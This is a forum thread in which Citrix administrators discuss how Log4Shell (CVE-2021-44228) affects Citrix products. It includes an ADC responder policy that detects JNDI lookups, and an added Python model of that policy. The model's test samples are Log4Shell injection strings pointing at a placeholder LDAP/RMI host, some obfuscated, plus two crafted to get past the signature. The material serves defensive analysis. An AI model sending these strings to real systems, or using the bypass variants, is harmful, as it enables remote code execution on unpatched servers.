Bernd Laenge, posted December 11, 2021:

Hi all,

just wanted to know if Citrix products are affected by the log4j vulnerability as well? CEM on premise? ADC? CVAD? Others?

https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/

Greetings, Bernd
Francis Guilbault1709153111, posted December 11, 2021:

Citrix Security Advisory for Apache CVE-2021-44228: https://support.citrix.com/article/CTX335705
Scott Bowling, posted December 11, 2021:

The Linux VDA appears to be impacted. But we won't really know until Citrix support provides updates.
Thingbaijam Lenin Singh, posted December 12, 2021:

Keeping an eye on this >>

Citrix is closely monitoring the recent vulnerability disclosure by Apache Software Foundation on December 10th, 2021 - CVE-2021-44228. Citrix has mobilized its Security and IT organizations to investigate the issue and immediately mitigate potential risks. Please find below the status of the products which are currently being investigated:

Customers who use Citrix ADC or Citrix Gateway as MPX, VPX or SDX instances and who are also not using the WIonNS feature are not impacted by this issue. Citrix is continuing to investigate any potential impact on the WIonNS feature deployments. Citrix is also continuing to investigate any potential impact on CPX and BLX instances.
Erwin de Beer1709152891, posted December 14, 2021:

After 4 days still no information about whether XenMobile is vulnerable. This is very worrying...
Eugene Beliaev, posted December 14, 2021:

Add on ADC to protect the vServer (bind to the vserver or globally as a responder policy):

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap
bind policy patset patset_cve_2021_44228 http
bind policy patset patset_cve_2021_44228 https
bind policy patset patset_cve_2021_44228 ldaps
bind policy patset patset_cve_2021_44228 rmi
bind policy patset patset_cve_2021_44228 dns
bind policy patset patset_cve_2021_44228 nis
bind policy patset patset_cve_2021_44228 iiop
bind policy patset patset_cve_2021_44228 corba
bind policy patset patset_cve_2021_44228 nds
add responder policy mitigate_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP
Joseph Rucker, posted December 14, 2021:

Any latest update on the Security Advisory for Apache CVE-2021-44228?
David Nguyen1709155977, posted December 14, 2021:

On 12/11/2021 at 6:56 AM, Scott Bowling said:
The Linux VDA appears to be impacted. But we won't really know until Citrix support provides updates.

I do see that log4j is available and used for debugging for the Linux VDA... but commented out... not sure if that is enough though.
Krsh K., posted December 15, 2021:

Hi. When I run the last command I get a message that says "Action not found". What gives? I have done it on a bunch of NetScalers with the same result. Please help.
Paul Jacobsen1709160118, posted December 15, 2021:

On 12/14/2021 at 1:43 PM, Erwin de Beer1709152891 said:
After 4 days still no information about whether XenMobile is vulnerable. This is very worrying...

Yes, Citrix Endpoint Management (aka XenMobile) is affected by the log4j vulnerability. If you have a firewall between the internet and your Citrix Endpoint Management nodes, block outgoing LDAP/LDAPS/DNS reverse callbacks.
Melissa Nelson, posted December 15, 2021:

6 hours ago, Paul Jacobsen1709160118 said:
Yes, Citrix Endpoint Management (aka XenMobile) is affected by the log4j vulnerability. If you have a firewall between the internet and your Citrix Endpoint Management nodes, block outgoing LDAP/LDAPS/DNS reverse callbacks.

Can your users still enroll devices with that block enabled?
Alex Coviello, posted December 16, 2021:

Curious: if Citrix ADC is not affected...

Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway): Not impacted (all platforms)

...why do we need to add this?

What Customers Should Do
Citrix has released configurations that are designed to mitigate the risk of exploit of CVE-2021-44228. Citrix ADC Standard, Advanced or Premium edition customers may use responder policies for protection as shown below. Please bind the responder policy to the appropriate bind point (vserver or global).

add policy patset patset_cve_2021_44228
bind policy patset patset_cve_2021_44228 ldap
bind policy patset patset_cve_2021_44228 http
bind policy patset patset_cve_2021_44228 https
bind policy patset patset_cve_2021_44228 ldaps
bind policy patset patset_cve_2021_44228 rmi
bind policy patset patset_cve_2021_44228 dns
add responder policy mitigate_exploit_cve_2021_44228 q^HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.FULL_HEADER.SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.AFTER_STR("${").BEFORE_STR("}").CONTAINS("${") || HTTP.REQ.BODY(8192).SET_TEXT_MODE(URLENCODED).DECODE_USING_TEXT_MODE.SET_TEXT_MODE(IGNORECASE).STRIP_CHARS("${: }/+").AFTER_STR("jndi").CONTAINS_ANY("patset_cve_2021_44228")^ DROP
Sabine Ludewig1709156713, posted December 16, 2021:

16 hours ago, Krsh K. said:
Hi. When I run the last command I get a message that says "Action not found". What gives? I have done it on a bunch of NetScalers with the same result. Please help.

Same here, please keep me posted if you find a solution. Do you have Web Application Firewall turned on? We don't, and my guess is that this is the reason, but not sure.
Sabine Ludewig1709156713, posted December 16, 2021:

7 hours ago, Alex Coviello said:
Curious: if Citrix ADC is not affected... Citrix ADC (NetScaler ADC) and Citrix Gateway (NetScaler Gateway): Not impacted (all platforms) ...why do we need to add this? [the advisory text and responder policy quoted in the post above]

Wondering the same here. The blog they are referring to below this statement talks about Web Application Firewall, which we don't use. Yet my customer ran a security scan and found the system vulnerable to Log4j. In the same context Citrix advises us to implement Apache patches as they become available.

Sorry Citrix, but it's YOUR job to provide us with a working solution and not have us compiling Linux libraries without (sorry for the vent).
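The responder-policy expression posted by Eugene Beliaev above and repeated from the Citrix advisory in Alex Coviello's post is two detection branches applied to the decoded headers and to the first 8192 bytes of the body: one looks for a `${` nested inside the first `${...}` (lookup-in-lookup obfuscation), the other strips `${: }/+`, lowercases, and checks whether anything after `jndi` contains a scheme from the patset. What follows is an added Python model of that expression, not Citrix code and not something posted in this thread, run over constructed sample requests. It assumes AFTER_STR/BEFORE_STR operate on the first occurrence of their argument, that URLENCODED decoding is plain %XX decoding, and that only the first 8192 bytes of the body are inspected, as HTTP.REQ.BODY(8192) states. The last two samples show inputs the signature does not cover; they are the reason the advisory text calls this a configuration to "mitigate the risk" for back-end servers behind the ADC rather than a fix.

```python
"""Model of the CVE-2021-44228 responder-policy expression quoted in this thread.

Added illustration, not Citrix code. Assumptions: AFTER_STR/BEFORE_STR act on the
first occurrence of their argument; URLENCODED decoding is plain %XX decoding
('+' is left alone, which is why '+' is in the STRIP_CHARS set); only the first
8192 bytes of the body are inspected, as HTTP.REQ.BODY(8192) implies.
"""
from urllib.parse import unquote

# Members of patset_cve_2021_44228 as listed in the advisory text quoted above.
PATSET = ("ldap", "http", "https", "ldaps", "rmi", "dns")
STRIP_CHARS = set("${: }/+")
BODY_LIMIT = 8192


def nested_lookup(text: str) -> bool:
    """AFTER_STR("${").BEFORE_STR("}").CONTAINS("${"): another ${ inside the first ${...}."""
    _, found, rest = text.partition("${")
    if not found:
        return False
    inner = rest.split("}", 1)[0]
    return "${" in inner


def jndi_scheme(text: str) -> bool:
    """IGNORECASE + STRIP_CHARS("${: }/+") + AFTER_STR("jndi") + CONTAINS_ANY(patset)."""
    stripped = "".join(ch for ch in text.lower() if ch not in STRIP_CHARS)
    _, found, after = stripped.partition("jndi")
    if not found:
        return False
    return any(scheme in after for scheme in PATSET)


def matching_branches(full_header: str, body: str) -> list:
    """Names of the OR-ed branches that evaluate true; a non-empty list means DROP."""
    header = unquote(full_header)
    body = unquote(body[:BODY_LIMIT])  # truncate to 8192 bytes first, then decode
    checks = [
        ("header:nested", nested_lookup(header)),
        ("header:jndi_scheme", jndi_scheme(header)),
        ("body:nested", nested_lookup(body)),
        ("body:jndi_scheme", jndi_scheme(body)),
    ]
    return [name for name, hit in checks if hit]


def responder_drops(full_header: str, body: str = "") -> bool:
    """True when the quoted policy would DROP the request."""
    return bool(matching_branches(full_header, body))


BENIGN_HEADER = ("GET /index.html HTTP/1.1\r\nHost: gateway.example.net\r\n"
                 "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n")


def header_with(value: str) -> str:
    """Constructed request header block with one attacker-controlled header value."""
    return f"GET / HTTP/1.1\r\nHost: gateway.example.net\r\nX-Api-Version: {value}\r\n\r\n"


# Constructed samples; 203.0.113.0/24 is documentation address space, not a real listener.
SAMPLES = {
    "benign": (BENIGN_HEADER, ""),
    "plain": (header_with("${jndi:ldap://203.0.113.5:1389/a}"), ""),
    "url_encoded": (header_with("%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%3A1389%2Fa%7D"), ""),
    "nested_lower": (header_with("${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"), ""),
    "nested_split_jndi": (header_with("${j${::-n}di:ldap://203.0.113.5:1389/a}"), ""),
    "body_only": (BENIGN_HEADER, "user=admin&note=${jndi:rmi://203.0.113.5:1099/x}"),
    # Not covered: the lookup sits beyond the 8192 bytes the body branch inspects.
    "beyond_body_limit": (BENIGN_HEADER, "a" * 9000 + "${jndi:ldap://203.0.113.5:1389/a}"),
    # Not covered: a harmless ${...} earlier in the header is what the first-occurrence
    # AFTER_STR/BEFORE_STR sees, and the split "jndi" defeats the stripped-text branch.
    "leading_lookup_then_split": (header_with("${date:yyyy} ${j${::-n}di:ldap://203.0.113.5:1389/a}"), ""),
}


def evaluate_samples() -> dict:
    """Map each sample name to the list of branches that fire on it."""
    return {name: matching_branches(hdr, body) for name, (hdr, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, branches in evaluate_samples().items():
        print(f"{name:28s} {'DROP' if branches else 'pass':5s} {branches}")
```

Reading the results branch by branch explains why both halves of the expression are there: `${j${::-n}di:...}` never contains the literal `jndi` once the special characters are stripped, so only the nested-lookup branch catches it, while a plain or %XX-encoded `${jndi:ldap://...}` has no nested `${` and is caught only by the stripped-text branch. The two uncovered samples are the practitioner's caveat: this is a signature in front of the back-end servers, so the Apache patches the advisory also points to are still the fix for the servers behind the ADC.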
Erwin de Beer1709152891, posted December 16, 2021:

On 12/14/2021 at 1:43 PM, Erwin de Beer1709152891 said:
After 4 days still no information about whether XenMobile is vulnerable. This is very worrying...

I've called Citrix support. They let me know XenMobile is indeed affected by the bug and a patch is available for the 10.14 release: https://support.citrix.com/article/CTX335763

No word on how much we were exposed, unfortunately. Also no mention of the vulnerability in the release notes.
Andreas Schott, posted December 16, 2021:

We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it.
Erwin de Beer1709152891, posted December 16, 2021:

6 minutes ago, Andreas Schott said:
We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it.

Really? OMG, again they totally drop the ball on a major security issue.
Erwin de Beer1709152891, posted December 16, 2021:

1 hour ago, Andreas Schott said:
We have the answer from support that the patch (https://support.citrix.com/article/CTX335763) does not contain a fix for CVE-2021-44248. They keep working on it.

Just asked support again and this is their response...

"Yes, the RP contains the mitigation steps; these were released yesterday after testing by our product team and the docs are in the process of being updated. The tentative date is by tomorrow, but you could consider the mail from our end as a confirmation for the same. Please let me know if you have any further queries on this.
<name redacted>
Senior Technical Support Engineer, Citrix Endpoint Management & Content Collaboration Support
Citrix R & D India Private Limited"
Andreas Schott, posted December 16, 2021:

31 minutes ago, Erwin de Beer1709152891 said:
Just asked support again and this is their response... [the support reply quoted in the post above]

I asked support again and it was confirmed to me that the RP contains mitigation steps. It's a security RP.
Erwin de Beer1709152891, posted December 16, 2021:

3 minutes ago, Andreas Schott said:
I asked support again and it was confirmed to me that the RP contains mitigation steps. It's a security RP.

Installed the patch and can confirm the system is no longer vulnerable using the available test tools.
Melissa Nelson, posted December 16, 2021:

Which RP has the mitigation? 10.13 Rolling Patch 5 and 10.14 Rolling Patch 2?
Thomas Greszlig, posted December 16, 2021:

Hi, is there a way to check the XenMobile log? On the NetScaler I can see it in the httpaccess-vpn logs. On XenMobile I find the logs but found nothing related to CVE-2021-44228. Does anyone know which file I need to look at?
Kurt Wagner1709157299, posted December 16, 2021:

5 hours ago, Thomas Greszlig said:
Hi, is there a way to check the XenMobile log? On the NetScaler I can see it in the httpaccess-vpn logs. On XenMobile I find the logs but found nothing related to CVE-2021-44228. Does anyone know which file I need to look at?

I too am interested in finding out which logs to check for evidence of an intrusion, if there was indeed one. Here is what support told me, which hardly inspires confidence:

"You could look in the support bundle: https://docs.citrix.com/en-us/xenmobile/server/monitor-support/support-bundles.html But I do not know what you would need to look for, or if it would be included there."
Thomas Greszlig, posted December 17, 2021:

Hi, I also have an open case with Citrix. Only links on how to get the normal log files. So annoying. I have now asked for the third time how to exactly detect an attack. On the NetScaler I see it in the httpaccess-vpn logs, something like: jndi: ldap: //195.54 ..... But on the XenMobile Server there is no log like that. I checked the whole hard disk. So is the XenMobile Server really attackable in this specific way, or does the server only use an attackable version of log4j? I don't see any hints that the XenMobile Server tried to connect to a server on the internet via LDAP. But I see incoming traffic with jndi: ldap: //195.54 .....
Thomas Greszlig, posted December 17, 2021:

Hi there, I spoke to Citrix support in Germany -> XenMobile was using a vulnerable version of log4j. But with the current attempts like ldap: //195.54 ..... via 443 to the XenMobile website, it is not possible to take over XenMobile (to get bash etc.). That also coincides with my findings. In the firewall logs I see incoming traffic with ldap: //195.54 ..... but no outgoing traffic from the XenMobile Server. In the new RPs version 2.16.0 is installed.